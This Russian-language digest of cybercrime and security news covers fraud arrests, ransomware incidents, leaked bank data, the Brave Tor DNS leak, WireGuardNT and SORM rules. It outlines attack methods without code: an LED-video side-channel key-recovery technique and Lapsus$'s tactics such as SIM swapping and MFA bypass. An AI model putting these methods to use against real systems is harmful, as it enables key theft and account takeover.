Создатель Signal пояснил идею интеграции криптовалюты в мессенджер желанием предоставить пользователям простую в использовании систему платежей, охраняющую конфиденциальность, аналогично тому, как мессенджер Signal обеспечивает безопасность общения. Брюс Шнайер, известный эксперт в области криптографии и компьютерной безопасности, раскритиковал действия разработчиков Signal. Шнайер считает, что складывание всех яиц в одну корзину не лучшее решение, и дело даже не в том, что это приводит к раздутию и усложнению программы, не в сомнительности применения блокчейна, и не в попытке привязать Signal к одной криптовалюте.
Ключевая проблема в том, что добавление системы платежей в приложение для сквозного шифрования создаёт дополнительные угрозы, связанные с повышением интереса различных спецслужб и государственных регуляторов. Защищённые коммуникации и защищённые транзакции вполне можно было реализовать отдельными приложениями. Приложения с реализаций надёжного сквозного шифрования и так находятся под ударом и дополнительно повышать градус противостояния опасно - когда функциональность объединена, воздействие на платёжную систему потянет за собой и функциональность сквозного шифрования. Если умрёт одна часть, то умрёт и вся система.
Прокуратура Тайваня предъявила обвинения основателю крупной местной биржи ACE Exchange в отмывании денег через криптовалюты и мошенничестве. Потери пострадавших клиентов оцениваются в 342 млн тайваньских долларов ($10,7 млн). Тайваньские правоохранители утверждают: ACE Exchange создала оффшорную организацию, чтобы клиенты могли использовать сервис Alfred Wallet. Инвесторам предлагалось вносить стейблкоины на этот кошелек, после чего Дэвид Пан (David Pan) и шесть других подозреваемых выводили криптоактивы. В полицию поступили жалобы от 162 человек, которым не удалось забрать собственные активы из этого кошелька. В ответ на обвинения нынешнее руководство ACE Exchange заявило, что Дэвид Пан уже не является руководителем биржи, а кошелек Alfred Walle не связан с компанией. Alfred Wallet был разработан Паном и привлеченными сторонними разработчиками без участия ACE Exchange. Биржа также попыталась успокоить пользователей, что уголовное дело не повлияет на работу площадки: «ACE Exchange работает без перебоев, а торговые операции совершаются в обычном режиме. Мы гарантируем безопасность пользовательских активов. Внесение депозитов, а также вывод средств в криптовалютах и новых тайваньских долларах работают без сбоев». В январе Дэвид Пан был задержан по другому делу о мошенничестве. Правоохранители обвинили его в размещении рекламы в соцсетях с целью побудить людей инвестировать в токены MOCT. После информации об аресте ACE Exchange сразу уточнила, что топ-менеджер прекратил работу в компании еще в 2022 году. В связи с тем, что прокуратура расследует деятельность площадки на наличие правонарушений, ACE Exchange была исключена из местной Ассоциации криптоиндустрии, созданной в марте при одобрении Министерства внутренних дел Тайваня.
В Испании задержали одного из лидеров хакерской группировки Kelvin Security. По предварительным данным, эта группировка устроила более 300 кибератак 90 странах мира. Об этом говорится в пресс-релизе Национальной полиции Испании.
Мужчину с гражданством Венесуэлы задержали в Аликанте на юго-востоке побережья Коста-Бланка. По данным следствия, задержанный был «главным ответственным лицом за отмывание денег, полученных от преступной деятельности».
Расследование кибератак группировки Kelvin Security началось в декабре 2021 года. Члены хакерской группировки искали уязвимости на сайтах стратегических объектов, и если им удавалось их найти, крали конфиденциальные данные и продавали их даркнете. Таким образом хакеры атаковали предприятия США, Германии, Италии, Аргентины, Чили и Японии.
source: t.me/policianacional/13977
Россиянам Даниилу Алдуненкову и Роману Брику, задержанным в Таиланде по подозрению в совершении незаконных операций с криптовалютой и участии в мошеннических схемах, грозит от 30 до 50 лет тюремного заключения. Об этом корреспонденту ТАСС сообщили в консульском отделе посольства РФ в Бангкоке.
"Сегодня в Бангкоке состоялось консульское посещение задержанных нашим сотрудником. Их обвиняют в мошенничестве с криптовалютой. В выходе под залог им отказали, что говорит о серьезности преступления, в совершении которого их подозревают. Есть также и отягчающие обстоятельства - это смерть граждан Таиланда. Наказание может быть серьезным. Преступления в экономической сфере, мошенничество с банковскими картами и криптовалютой с отягчающими обстоятельствами в Таиланде может повлечь весьма суровое наказание в виде тюремного заключения от 30 до 50 лет", - информировали в консульском отделе.
source: tass.ru/proisshestviya/18670681

and Visualization ](https://techcommunity.microsoft.com/t5/microsoft-365-blog/introducing- python-in-excel-the-best-of-both-worlds-for-data/ba-p/3905482)
Today, we are excited to introduce the Public Preview of Python in Excel – making it possible to integrate Python and Excel analytics within the..
techcommunity.microsoft.com
Python in Excel combines Python's powerful data analysis and visualization libraries with Excel's features you know and love. You can manipulate and explore data in Excel using Python plots and libraries, and then use Excel's formulas, charts and PivotTables to further refine your insights.
Now you can do advanced data analysis in the familiar Excel environment by accessing Python directly from the Excel ribbon. No set up or installation is required. Using Excel’s built-in connectors and Power Query, you can easily bring external data into Python in Excel workflows.
Молодец Microsoft. Большое спасибо )))
Группа исследователей из университета имени Давида Бен-Гуриона (Израиль) разработала новый метод атак по сторонним каналам, позволяющий удалённо восстановить значения ключей шифрования на базе алгоритмов ECDSA и SIKE через анализ видео с камеры, снимающей светодиодный индикатор ридера смарт-карт или устройства, подключённого к одному USB-хабу со смартфоном, производящим операции с ключом.
Метод основан на том, что в процессе вычислений в зависимости от выполняемых на CPU операций меняется потребление энергии, что приводит к небольшим флуктуациям в яркости свечения светодиодных индикаторов питания. Изменение свечения, которое напрямую коррелирует с производимыми вычислениями, можно уловить на современные цифровые камеры видеонаблюдения или камеры смартфонов, а анализ данных с камеры позволяет косвенно восстановить информацию, используемую при вычислениях.
Для обхода ограничения точности выборки, связанного с записью лишь 60 или 120 кадров в секунду, применён поддерживаемый некоторыми камерами режим временного параллакса (rolling shutter), отражающий в одном кадре разные участки быстро меняющегося предмета в разные моменты времени. Применение данного режима позволяет анализировать до 60 тысяч измерений свечения в секунду при съёмке на камеру iPhone 13 Pro Max c исходной частотой в 120 FPS, если изображение светодиодного индикатора занимает весь кадр (для приближения перед объективом выставлялась линза). При анализе рассматривалось изменение отдельных компонентов цвета (RGB) индикатора в зависимости от изменения энергопотребления процессором.
Для восстановления ключей использовались известные методы атак Hertzbleed на механизм инкапсуляции ключей SIKE и Minerva на алгоритм создания цифровой подписи ECDSA, адаптированные для применения с иным источником утечки по сторонним каналам. Атака эффективна только при использовании уязвимых реализаций ECDSA и SIKE в библиотеках Libgcrypt и PQCrypto-SIDH. Например, подверженные атаке уязвимые библиотеки используются в смартфоне Samsung Galaxy S8 и шести купленных на Amazon смарткартах от пяти разных производителей.
Исследователями проведено два успешных эксперимента. В первом удалось восстановить 256-разрядный ключ ECDSA из смарткарты через анализ видео LED- индикатора ридера смарткарт, снимаемого на подключённую к глобальной сети камеру видеонаблюдения, размещённую в 16 метрах от устройства. Атака заняла около часа и потребовала создания 10 тысяч цифровых подписей.
Во втором эксперименте удалось восстановить 378-разрядный ключ SIKE, используемый на смартфоне Samsung Galaxy S8, на основе анализа видеозаписи индикатора питания USB-колонок Logitech Z120, подключённых к одному USB-хабу, через который заряжался смартфон. Видео было снято на камеру смартфона iPhone 13 Pro Max. Во время анализа на смартфоне выполнялась атака на основе подобранного шифротекста (постепенный подбор на основе манипуляций с зашифрованным текстом и получения его расшифровки), в ходе которой было выполнено 121 тысяча операций c ключом SIKE.
Полицейский в составе следственно-оперативной группы выехал на отработку сообщения о смерти 63-летней женщины. В квартире он обнаружил мобильный телефон покойной и решил, что это идеальный инструмент для установления родственных связей... и для получения кредита.
С телефона он подал заявку на кредит более чем на миллион рублей, но, увы, банк оказался не таким наивным и потребовал предъявления паспорта. Не смущаясь, сверхразум оформил другой кредит на 120 тысяч рублей, которые быстро перевел на свою карту и обналичил.
Но этого ему показалось мало, и он решил, что пенсионерка, безусловно, хотела бы поддержать его финансово, поэтому похитил еще 74 тысячи рублей с её счета.
В итоге его схему раскрыли и теперь ему грозит расширение заднего прохода.
Как сообщает британское Национальное агентство по борьбе с преступностью (NCA), суд Великобритании приговорил к лишению свободы в общей сложности на 35 лет двух мужчин, которые отмыли сумму, эквивалентную примерно 95 миллионам долларов, и мошенническим путем получили для своих подставных компаний 13,44 миллиона долларов кредитов на восстановление бизнеса в условиях пандемии COVID-19.
В итоге семинедельного разбирательства в сентябре суд приговорил 38-летнего россиянина Артема Терзяна и 44-летнего литовца Дейвиса Грочацкого к 17 и 16 годам тюрьмы соответственно.
Как сообщают в NCA, их приговоры — одни из самых серьезных, когда-либо вынесенных в Великобритании за отмывание денег.
Расследование начали в октябре 2017 года: полицейские увидели, как Ауриэль Зилифи оставил сумку с деньгами в Audi у офиса бухгалтерской конторы на северо-западе Лондона.
Месяц спустя человек по имени Артур Терзиу передал Зилифи наличные (сумму, эквивалентную примерно 54 тысячам долларов) в подземном гараже здания, где находится его квартира, — в комплексе Hazlemere Court в Хендоне. Обоих мужчин арестовали и приговорили к году тюрьмы.
Полицейские обыскали квартиру Зилифи и обнаружили подробные бухгалтерские записи, в которых отражены совершенные за четыре месяца нелегальные трансакции на сумму свыше 9,4 миллиона долларов.
После того как преступников отправили в тюрьму, та же Audi еще семь месяцев доставляла сумки с деньгами в дом, где по соседству жили Терзян и Грочацкий.
Мошенники открыли для подставных компаний банковские счета и перемещали деньги между ними, а после средства выводили на счета в Германии, Чехии, ОАЭ, Гонконге и Сингапуре.
Терзяна и Грочацкого задержали в июне 2018 года. Правоохранители конфисковали у них документы с детализацией отмывочных трансакций, компьютер, зашифрованный телефон, банковские карты и сведения о счетах. Изучив изъятые документы, следователи выяснили, что с 2017 по 2018 год преступники отмыли сумму, эквивалентную примерно 48 миллионам долларов, и 21,5 миллиона составили вклады.
Выйдя на свободу, Терзян и Грочацкий придумали, как нажиться на программе господдержки в условиях пандемии COVID-19: они заработали 13,44 миллиона долларов, мошенническим путем получив для своих компаний кредиты на восстановление бизнеса.
В ноябре 2020 года преступников арестовали вновь. Власти установили, что с июня 2018 года они отмыли еще 45 миллионов долларов.
«Эти лица и подконтрольная им сеть помогают другим преступникам прятать и выводить заработанные нелегальным путем средства. Ликвидация этой структуры станет серьезным ударом по британской и международной оргпреступности», — говорит Энди Тикнер из подразделения NCA по борьбе с оргпреступностью (Organised Crime Partnership).
• Source: <https://www.nationalcrimeagency.gov.uk/news/international- fraudsters-ran-70m-money-laundering-scheme>
Джейсон Доненфилд (Jason A. Donenfeld), автор VPN WireGuard, представил проект WireGuardNT, развивающий высокопроизводительный порт VPN WireGuard для ядра Windows, совместимый с Windows 7, 8, 8.1 и 10, и поддерживающий архитектуры AMD64, x86, ARM64 и ARM. Код реализации распространяется под лицензией GPLv2. Новый драйвер уже включён в состав клиента WireGuard для Windows, но пока помечен экспериментальным и не активирован по умолчанию.
Порт основан на проверенной кодовой базе основной реализации WireGuard для ядра Linux, которая была переведена на использование сущностей ядра Windows и сетевого стека NDIS. По сравнению с ранее доступной для Windows реализацией wireguard-go, работающей в пространстве пользователя и использующей сетевой интерфейс Wintun, WireGuardNT отличается существенным повышением производительности за счёт исключения операций переключения контекста и копирования содержимого пакетов из ядра в пространство пользователя. По аналогии с реализациями для Linux, OpenBSD и FreeBSD в WireGuardNT вся логика обработки протокола работает непосредственно на уровне сетевого стека.
Несмотря на то, что специфичные оптимизации ещё не проводились, WireGuardNT уже позволил добиться пиковой производительности передачи данных на уровне 7.5Gbps в имеющемся тестовом окружении с Ethernet. На реальных пользовательских системах с Wi-Fi производительность заметно ниже, но мало чем отличается от прямой передачи данных. Например, в системе с беспроводной картой Intel AC9560 пропускная способность без WireGuard составила 600Mbps и с WireGuardNT тоже осталась на уровне 600Mbps, в то время как при использовании wireguard-go/Wintun составляла 95Mbps.
Напомним, что VPN WireGuard реализован на основе современных методов шифрования, обеспечивает очень высокую производительность, прост в использовании, лишён усложнений и хорошо зарекомендовал себя в ряде крупных внедрений, обрабатывающих большие объёмы трафика. Проект развивается с 2015 года, прошёл аудит и формальную верификацию применяемых методов шифрования. В WireGuard применяется концепция маршрутизации по ключам шифрования, которая подразумевает привязку к каждому сетевому интерфейсу закрытого ключа и применение для связывания открытых ключей.
Обмен открытыми ключами для установки соединения производится по аналогии с SSH. Для согласования ключей и соединения без запуска отдельного демона в пространстве пользователя применяется механизм Noise_IK из Noise Protocol Framework, похожий на поддержание authorized_keys в SSH. Передача данных осуществляется через инкапсуляцию в пакеты UDP. Поддерживается смена IP-адреса VPN-сервера (роуминг) без разрыва соединения с автоматической перенастройкой клиента.
Для шифрования используется потоковый шифр ChaCha20 и алгоритм аутентификации сообщений (MAC) Poly1305, разработанные Дэниелом Бернштейном (Daniel J. Bernstein), Таней Ланге (Tanja Lange) и Питером Швабе (Peter Schwabe). ChaCha20 и Poly1305 позиционируются как более быстрые и безопасные аналоги AES-256-CTR и HMAC, программная реализация которых позволяет добиться фиксированного времени выполнения без задействования специальной аппаратной поддержки. Для генерации совместного секретного ключа применяется протокол Диффи-Хеллмана на эллиптических кривых в реализации Curve25519, также предложенной Дэниелом Бернштейном. Для хеширования используются алгоритм BLAKE2s (RFC7693).
РБК сообщает, что в сети продают дамп, содержащий данные людей, которые хотели взять кредит в банке «Дом.РФ». База была выставлена на продажу 3 апреля 2021 года и содержит 104 800 записей.
Фото: Telegram-канал "Утечки информации"
Продавец сообщает, что первые записи в дампе датируются февралем 2020 года, последние — мартом 2021 года. В случае минимального заполнения заявки на кредит запись может содержать сумму потенциального кредита, номер телефона и адрес электронной почты. Если же заявка была заполнена обстоятельно, запись содержит: ФИО, дату рождения, сумму и вид кредита (потребительский), номер телефона, почтовый ящик, паспортные данные, ИНН, СНИЛС, домашний адрес, адрес места работы, должность, размер дохода, а также информацию о доверенном лице (ФИО, номер телефона, кем приходится заемщику) и другие сведения.
Злоумышленник заявляет, что вся база стоит 100 000 рублей, а отдельные строки с данными за 2021 год продаются за 15 рублей, за вторую половину 2020 года — 10 рублей, за первую половину 2020 года — 7 рублей.
Журналисты РБК ознакомились с пробником дампа, который содержал данные десяти клиентских записей c полным или почти полным набором данных. В итоге из шести человек четверо подтвердили, что обращались в банк «Дом.РФ» за кредитом или уже являются его действующими клиентами. Двое пояснили, что подавали заявку несколько дней назад, еще двое подтвердили другую личную информацию из файла (ФИО, контактный номер телефона, домашний адрес или место работы), отказавшись говорить о своих заявках на кредит.
Представитель банка «Дом.РФ» подтвердил изданию факт утечки. Сообщается, что утечка произошла из-за уязвимости в дистанционной подаче первичных заявок на получение кредита наличными. Это первый случай, когда мошенникам удалось получить частичный доступ к внешним заявкам банка, но в «Дом.РФ» уверяют, что утечка произошла не из учетных систем кредитной организации, а безопасности счетов ничего не угрожает.
«В рамках оперативных работ она была в короткий срок устранена, в настоящий момент все системы банка функционируют в штатном режиме. В профилактических целях служба безопасности банка “Дом.РФ” проверила целостность работ всех других систем банка и не выявила нарушений», — сказал он, подчеркнув, что данные не позволяют получить доступ к счетам клиентов.
Click to expand...
По информации РБК, об утечке известно уже Банку России, который проводит проверку случившегося.
Источник: xakep.ru/2021/04/05/domrf-leak/
Следователи отделения полиции № 1 Хмельницкого районного отдела полиции совместно с сотрудниками киберполиции задокументировали преступную деятельность 30-летнего мужчины, который на хакерских форумах продавал пароли доступа к платежным системам граждан.
Действия фигуранта квалифицированы по ч. 1 ст. 361-2 (Несанкционированные сбыт или распространение информации с ограниченным доступом, которая хранится в электронно-вычислительных машинах (компьютерах), автоматизированных системах, компьютерных сетях или на носителях такой информации) Уголовного кодекса Украины. Санкция статьи предусматривает максимальное наказание в виде до двух лет лишения свободы.
По предварительной информации, злоумышленник с помощью специального программного обеспечения похищал пароли к учетным записям платежных систем и электронных кошельков граждан, формировал соответствующие электронные базы и продавал их на форумах. База фигуранта насчитывала около 20 тысяч учетных данных пострадавших.
Во время проведения санкционированного обыска по месту жительства мужчины полицейские изъяли компьютерную технику и носители информации, которую направили на проведение соответствующих экспертиз.
Сейчас полицейские проводят все необходимые следственные и процессуальные действия, для установления количества потерпевших и размер нанесенного им ущерба.
Анонимный ИБ-эксперт обнародовал исследование, согласно которому, браузер Brave, работающий в режиме Tor, оставлял следы в логах на DNS-сервере. Так, браузер раскрывал URL-адреса onion-сайтов, которые посещал пользователь.
Режим Tor был интегрирован в Brave еще в 2018 году, он позволяет пользователям посещать onion-сайты. Это реализовано посредством проксирования запросов пользователя через узлы Tor, которые осуществляют запрос к onion-ресурсу вместо него, а затем передают обратно полученный HTML.
Исследователь сообщил, что когда браузер работает в режиме Private window with Tor, он передает на DNS-сервер onion-адреса любых посещаемых сайтов в формате стандартного DNS-запроса (чего, разумеется, происходить не должно). В видео ниже, записанном журналистами Bleeping Computer, видно, как «луковые» адреса DuckDuckGo и NY Times выполняли DNS-запросы к локально настроенному DNS- серверу (общедоступным серверам Google по IP-адресу 8.8.8.8).
Впервые информация об этой проблеме была опубликована на Reddit, и сначала многие усомнились в корректности выводов эксперта. Однако вскоре существование бага подтвердили такие известные ИБ-специалисты, как главный исследователь PortSwigger Web Security Джеймс Кеттл (James Kettle) и аналитик CERT/CC Уилл Дорманн (Will Dormann).
__https://twitter.com/x/status/1362754846726770689
Разработчики Brave уже сообщили, что им известно о проблеме, и патч для нее был включен в сборку Brave Nightly еще две недели назад, после получения сообщения об ошибке. Исправление обещают перенести в стабильную версию уже во время следующего обновления браузера.
Источником бага оказался встроенный в Braveблокировщик рекламы, который использовал DNS-запросы для обнаружения сайтов, пытающихся обойти его запреты, но исключить домены .onion из этих проверок разработчики забыли.
__https://twitter.com/x/status/1362796915063021569
Источник: xakep.ru/2021/02/20/brave-onion-leak/
Ранее на этой неделе издание Bleeping Computer сообщало, что у американского подразделения Kia Motors (Kia Motors America) возникли серьезные проблемы в работе. Массовый сбой затронул мобильные приложения UVO Link, телефонные сервисы, платежные системы, портал для владельцев авто, а также внутренние сайты, используемые дилерскими центрами.
[](https://xakep.ru/wp- content/uploads/2021/02/340046/maintenance-message.jpg)
Вскоре после этого изданию стало известно, что Kia Motors пострадала от атаки шифровальщика. К примеру, пользователь писал в Twitter, что приехал в дилерский центр забрать новую машину, но там ему сообщили, что все серверы отключены из-за атаки вымогателя.
Также в распоряжении Bleeping Computer оказалась записка вымогателей, где они требуют выкуп. Судя по всему, это послание было создано операторами DoppelPaymer, но они заявляют, что атаковали Hyundai Motor America, материнскую компанию Kia. При этом непохоже, что Hyundai пострадал от этой атаки.
[](https://xakep.ru/wp- content/uploads/2021/02/340046/kia-ransom-note.jpg)
В послании указана ссылка на даркнет-сайт злоумышленников, где пострадавшим предлагается заплатить выкуп. На сайте тоже отчетливо видно, что он адресован представителям Hyundai Motor America. Хотя на этой странице сказано, что во время атаки у Kia Motors America было украдено «огромное количество» данных и они будут опубликованы в открытом доступе через 2-3 недели, если компания не пойдет на переговоры и не заплатит выкуп.
[](https://xakep.ru/wp- content/uploads/2021/02/340046/kia-tor-payment-page.jpg)
Согласно сайту, операторы DoppelPaymer потребовали у компании 404 биткоина (около 20 000 000 долларов). Если выкуп не будет оплачен в течение 10 дней, сумма увеличивается до 600 биткоинов (порядка 30 000 000 долларов).
[](https://xakep.ru/wp- content/uploads/2021/02/340046/ransom-amount.jpg)
Однако представители Kia Motors America сообщили изданию, что у них пока нет никаких доказательств того, что компания пострадала от атаки шифровальщика. Якобы в настоящее время специалисты Kia просто устраняют некий «длительный сбой систем».
Источник: xakep.ru/2021/02/18/kia-doppelpaymer/
Под процессуальным руководством органов прокуратуры совместно с БЭБ Украины, территориальными подразделениями Нацполиции Украины, Департаментом КИБ СБУ и территориальными подразделениями Департамента киберполиции проведены операции по противодействию преступности в киберпространстве на территории семи областей.
По результатам следственных действий сообщено о подозрении 25 лицам. Они организовали деятельность мошеннических колцентров. Пострадавшие, преимущественно граждане преклонного возраста, платили им средства за якобы приобретение товаров бытового назначения.
Участники преступной организации использовали фишинговые сайты и в дальнейшем перечисляли похищенные у граждан средства на подконтрольные им криптокошельки. Несанкционированно вмешивались в учетные записи систем удаленного управления счетами банков, перевыпуская сим-карты граждан, и использовали их как финансовые номера для входа в учетные записи пострадавших.
Подозреваемые звонили гражданам от имени работников службы безопасности банка, узнавали конфиденциальную информацию, получали доступ к управлению счетами и выводили средства потерпевших на свои счета. В целом сумма убытков гражданам составляет более 5 млн грн.
Правоохранители провели 50 обысков во Львовской, Днепропетровской, Харьковской, Запорожской, Житомирской, Черниговской, Хмельницкой областях и в г. Киеве. Изъяли 139 компьютеров, 56 мобильных телефонов, 45 банковских карт «дропов», 26 сим-карт, более 38 стартовых пакетов мобильных операторов, черновые записи.
Подозреваемым инкриминировано участие в преступной организации, мошенничестве, совершении краж, а также несанкционированном вмешательстве в работу информационных систем и несанкционированном сбыте или распространении информации с ограниченным доступом, которая хранится в электронно- вычислительных машинах (компьютерах), автоматизированных системах, компьютерных сетях или на носителях такой информации (ст. 255, ст. 190, 185, 361, ст. 361-2 УК Украины).
Сейчас решается вопрос об избрании им мер пресечения и наложении арестов на имущество.
Следственные действия продолжаются.
• Source: https://gp.gov[.]ua/ua/posts/pravooxoronci-proveli-operaciyi-z- protidiyi-kiberzlocinnosti-povidomleno-pro-pidozru-25-ucasnikam-organizacii
Служба безопасности ликвидировала в Киеве ботофермы, которые проводили информационные диверсии в пользу российской разведки. В ходе комплексных мероприятий задержаны двое организаторов, которые массово распространяли дезинформацию о войне в Украине и пытались искусственно дискредитировать Силы обороны.
Для этого создавали фейковые аккаунты в соцсетях и мессенджерах, в частности от имени Председателя Службы безопасности и начальника ГУР МО.
Чтобы создать видимость «настоящих» страниц, на этих аккаунтах пересматривали официальные сообщения от СБУ и ГУР. Впрочем, в личных сообщениях злоумышленники выманивали у людей деньги и предлагали свою «помощь».
Также они регистрировали фейковые страницы украинцев из разных регионов как в Facebook, Twitter, Instagram и Tik-Tok, так и в российских «Одноклассниках» и «Вконтакте». В целом мощности ботофермы позволяли ее организаторам ежедневно генерировать более 1 тыс. фейковых аккаунтов.
Для их администрирования фигуранты установили в собственных домах специализированные программно-аппаратные комплексы.
Злоумышленники координировали свои действия с представителями российской разведки, от которых получали «методички» для проведения подрывной деятельности.
Таким образом враг надеялся расшатать общественно-политическую обстановку в Украине и навредить имиджу нашего государства на международной арене.
Во время обысков в помещениях организаторов ботоферм обнаружено:
специализированное оборудование для «выращивания» вымышленных интернет-адресов;
Сим-карты мобильных операторов, на которые регистрировали подконтрольные аккаунты.
Также у злоумышленников изъято незарегистрированное огнестрельное оружие с боеприпасами к нему и боевые гранаты.
Сейчас следователи Службы безопасности сообщили обоим задержанным о подозрении по ч. 1 ст. 263 Уголовного кодекса Украины (незаконное обращение с оружием, боевыми припасами или взрывчатыми веществами).
Фигуранты находятся под стражей.
Злоумышленникам грозит до 7 лет тюрьмы.
sc: facebook.com/SecurSerUkraine/posts/pfbid02pzZrUbSHvjHMDmUT8LQCKm3vMwenNMMqkNhXCxj3mbeqM6LPzqT3UBZ8XqwiYiTpl
#news Что происходит, когда оператор фейкового Privnote приходит с угрозами в Metamask за несправедливую блокировку своего «легитимного» сайта? Он не только получает разворот от продакт лида, но ещё и привлекает внимание Кребса. Как ему пройти мимо: фишинговые сайты-то на русские имена.
Некие Андрей Сокол из Москвы и Александр Ермаков из Киева. Вероятно, псевдонимы. На парочку зарегистрирована куча доменов под спуфинг Privnote. Отличительная особенность: криптоадреса в записках подменяются на кошельки злоумышленников. Один из скам-сайтов сейчас четвёртый в выдаче Гугла по запросу «Privnote», а судя по кошелькам, операция на сотни тысяч долларов. Подробнее о приключениях любимчиков Кребса — русских киберпреступников — у него в блоге. Материал интересный: одним Privnote деятельность злоумышленников не ограничивается. Так, у авторов жалоб в Metamask нашлись скам-сайты и под сам кошелёк. Такая вот ирония.
https://krebsonsecurity[.]com/2024/04/fake-lawsuit-threat-exposes-privnote- phishing-sites/
Давно уже идут разговоры о том, что крупные игроки на IT-рынке будут уходить от системы логин-пароль, заменяя ее био-идентификацией. Для Windows 11 компания Microsoft уже [объявила](https://www.techradar.com/pro/security/windows-11-is-officially- killing-off-passwords-and-bringing-in-passkeys) о том, что в новом обновлении можно будет создать ключ-пароль с помощью Windows Hello, после чего использовать возможности этого сервиса для доступа к поддерживаемым сервисам.
Система ключей основана на паре криптографических ключей, один из которых хранится в "облаке", а другой - на устройстве. Эти ключи являются приватными и хорошо защищены, и их сочетание позволяет получить доступ к соответствующему сервису.
Сейчас все больше сервисов поддерживают эту систему, и это действительно очень удобно.
В частности, Roboform умеет поддерживать идентификацию через Windows Hello, и это очень ускоряет работу с ним, потому что мастер-пароль - длинный и сложный, и его замучаешься каждый раз вводить.
© Exler
Азиатская авиакомпания с миллиардным доходом стала одной из первой жертв
группировки.
В киберпространстве [появилась новая банда вымогателей](https://id- ransomware.blogspot.com/2023/03/money-encryptor-ransomware.html) под названием «Money Message», нацеленная на жертв по всему миру и требующая выкуп в миллионы долларов за то, чтобы не произошла утечка данных и жертве был предоставлен дешифратор.
О новой программе-вымогателе впервые сообщила жертва на форумах BleepingComputer 28 марта 2023 года, а ThreatLabz Zscaler – после публикации информации в Twitter *.
В настоящее время на сайте группировки указаны 2 жертвы, одна из которых – азиатская авиакомпания с годовым доходом около $1 млрд. Злоумышленники утверждают, что украли у компании конфиденциальные файлы, и в качестве доказательства прикрепили скриншот файловой системы, к которой был получен доступ.
В ходе расследования BleepingComputer обнаружил доказательства потенциального взлома известного поставщика компьютерного оборудования. Однако на данный момент экспертам не удалось самостоятельно подтвердить атаку.
Как Money Message шифрует компьютер
Шифровальщик Money Message написан на C++ и включает в себя встроенный файл конфигурации JSON, определяющий способ шифрования устройства.
Этот файл конфигурации определяет:
По словам исследователя безопасности rivitna , при шифровании используется механизм ChaCha20/ECDH. Шифрование Money Message проходит медленно по сравнению с другими шифровальщиками. После шифрования устройства программа-вымогатель создаёт записку с требованием выкупа, содержащую ссылку на сайт TOR, используемый для переговоров с хакерами.
Появление группы программ-вымогателей Money Message представляет собой дополнительную угрозу, которую организации должны остерегаться. Несмотря на то, что шифратор группы прост по структуре, киберпреступники успешно крадут данные и шифруют устройства во время атак.
*Социальная сеть запрещена на территории Российской Федерации
Подробнее:
https://www.securitylab.ru/news/537358.php
Они использовали очень старую разводку и приехали за деньгами прямо к полицейским.
Правоохранителей вызвала местная жительница. Она рассказала, что ей позвонили неизвестные и сообщили, что её родственник стал виновником ДТП. Чтобы он не попал в тюрьму, ей нужно было заплатить 970 тысяч. Передать их нужно курьерам, которые любезно приедут к подъезду.
Но вместо денег там их уже ждали полицейские. Оказалось, что курьеров трое. Один из них, 19-летний Марк Лысяков напал на сотрудника, ударив его в лицо, и попытался сбежать. Тогда оперативник достал личный травмат и сделал три выстрела: один предупредительный, а два — в спину беглеца. Пули попали в область правой лопатки и правой почки.
В этот момент второй полицейский задерживал другого курьера, 19-летнего Максима Киржаева. С ним проблем не возникло — на подозреваемого надели наручники, сопротивления он не оказывал. А вот третьему парню всё же удалось сбежать. Итого полицейские задержали двоих человек. Одному из них, помимо подозрений в мошенничестве, светит уголовное дело за нападение на полицейского.
Бразилия начала расследование действий группы после многочисленных кибератак на госучреждения страны.
16 августа Федеральная полиция Бразилии выдала 8 ордеров на обыск и конфискацию в рамках расследования атак, заявленных группировкой Lapsus$, которые нарушили работу Министерства здравоохранения страны в декабре 2021 года. Об этом полиция сообщила в пресс-релизе .
Полиция не назвала конкретно Lapsus$ Group, но детали расследования совпадают с атакой группы. Эксперты связывают атаки с «транснациональной киберпреступной организацией, «направленной на государственные и частные организации в Бразилии, США, Португалии и Колумбии».
По словам бразильской полиции, помимо Министерства здравоохранения
злоумышленник проник в 9 других местных организаций, в том числе в
Министерство экономики и Национальное электроэнергетическое агентство.
После расследования атаки на министерство здравоохранения Бразилии Microsoft
написала, что тактика группы включает следующие действия:
телефонная социальная инженерия;
замена SIM-карты для облегчения захвата учетной записи;
доступ к учетным записям электронной почты сотрудников целевых организаций;
оплата сотрудникам, поставщикам или деловым партнерам целевых организаций за
доступ к учетным данным;
обход многофакторной аутентификации;
вмешательство в звонки своих жертв для связи в кризисных ситуациях;
использование инсайдеров в компании для атак.
В марте полиция Великобритании арестовала 7 предположительных участников Lapsus$ в возрасте от 16 до 21 года. Однако, группа продолжала публиковать сообщения в течение нескольких дней после арестов, в том числе информацию об утечке данных Globant . Однако, в Telegram-канале Lapsus$ нет сообщений с конца марта.
source: gov.br/pf/pt-br/assuntos/noticias/2022/08/pf-realiza-operacao-para- apurar-ataques-a-sites-do-governo-federal
Силовики просят Минцифры доработать требования к «сорму». Сотовые операторы должны будут не только собирать и хранить весь трафик, но и раскладывать его по отдельным папкам. Расходы на изменение архитектуры могут лечь на плечи операторов.
Технические решения по оборудованию для оперативно-разыскных мероприятий (СОРМ) придется пересмотреть и доработать. На проект приказа Минцифры, размещенный на портале regulation.gov.ru, сегодня обратил внимание “Ъ”. По новым правилам, системы СОРМ должны будут отдельно выделять и хранить трафик звонков через интернет, геопозицию пользователя и историю браузера.
Эти данные требовались и раньше. По «закону Яровой» операторы собирают телефонные разговоры, текстовые сообщения, изображения, видеозаписи и другие электронные сообщения пользователей. Хранить переговоры и сообщения нужно полгода, а интернет-трафик — 30 дней. ФСБ получает доступ к системам СОРМ по решению суда.
В Минцифре «Ъ» пояснили: проект приказа корректирует требования к параметрам технических средств СОРМ-3 (ТС ОРМ, находятся у операторов) и кодирования информации между пультом управления СОРМ (находится у ФСБ), а также к параметрам сбора информации, к формату ее хранения, взаимной аутентификации ТС ОРМ и пульта управления, к резервированию пропускной способности каналов между ними.
Из приказа, в частности, следует, что информация о соединениях абонентов, использующих услуги VoWiFi (WiFi Calling и аналогичные), должна храниться в ИС ОРМ в формате статистических записей о телефонных соединениях. В качестве информации о местоположении должны указываться географические координаты устройства либо IP-адрес и порт точки доступа Wi-Fi-сети. Также отдельно должна выделяться информация о фактах входа и иных действиях в личном кабинете абонента.
В Минцифре уверяют, изменения коснутся больше производителей оборудования и органов по его сертификации: Дополнительных затрат от операторов и производителей не потребуется, говорят в Министерстве.
Однако источники «Ъ» сомневаются в том, что инициатива не потребует затрат от операторов:
По словам собеседника издания, если текущее оборудование не справится, операторам придется закупить новое.
Эксперты согласны с мнением собеседника «Ъ» о возможных дополнительных тратах:
